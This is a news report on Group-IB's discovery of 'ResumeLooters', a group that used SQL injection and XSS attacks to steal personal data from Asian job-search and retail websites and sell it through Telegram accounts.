Singapore-based infosec firm Group-IB has detected a group that spent the last two months of 2023 stealing personal info from websites operated by jobs boards and retailers websites across Asia.
The actors, dubbed “ResumeLooters” by Group-IB, used SQL injection and Cross-Site Scripting (XSS) attacks to steal databases from the sites. That tactic produced over two million email addresses, plus names, phone numbers, dates of birth, and employment history.
“The initial victims that we identified were mainly job search websites. Additionally, the group focuses on selling data stolen from recruiting agencies,” Nikita Rostovcev, a senior analyst from the cyber security firm, told The Reg.
Rostovcev declined to name the retailers hit by the looters, but confirmed that they included “e-commerce companies of various sizes, including some that are quite popular in their respective markets.”
While SQL injection was the gang’s main tool, XSS scripts were used on four legitimate job search websites. The threat actors prepared fake profiles on job search sites that would inject malicious scripts into web pages viewed by victims, allowing the attacker to steal information, manipulate content, or perform other malicious actions. Group-IB believes the main goal was to steal admin credentials, but found no evidence the gang succeeded with that effort.
“The presence of this code on these pages does not necessarily imply that it was executed on every device. However, it does indicate the persistence of the attackers and their attempts to inject their XSS scripts into all possible input fields on the targeted websites. Group-IB has also found evidence that the XSS script was executed on some of the visitors’ devices,” noted Group-IB’s infosec analysts.
Although all compromised websites were found at the end of 2023, Group-IB believes the attacks began as early as January of the same year.
Some 70 percent of victims were in the APAC region, with only a minority elsewhere. The largest number of hacked websites came from India (12), with Taiwan (10), Thailand (9) and Vietnam (7) following close behind.
Group-IB identified a malicious server that contained the logs of multiple penetration testing tools. The group favored open source tools –, like sqlmap, Acunetix, the Beef Framework, X-Ray, Metasploit, ARL, and Dirsearch.
Commands on the server led Group-IB to believe that the threat actors were attempting to gain shell access on target systems to download and execute additional payloads and hunt for additional data while in control of a victim’s server. However it’s unknown if ResumeLooters succeeded.
The threat actor’s server contained an open directory in which the crims stored stolen source code pages, cookies and notes about victims. They failed to disable its directory listing, however, which led to its discovery.
Group-IB traced the email address employed by ResumeLooters in their campaign to two different Chinese-language Telegram accounts, one of which listed the stolen data for sale. One account was named “渗透数据中心,” which translates to “Penetration Data Center” in simplified Chinese. The other was called “万国数据阿力” which translates to “World Data Ali.”
The Reg was told that many of the comments in the code were made in Chinese – supporting an assumption the attackers hail from the Middle Kingdom.
Rostovcev commented that it is believed the threat actors targeted their home region, as it is more familiar to them. ®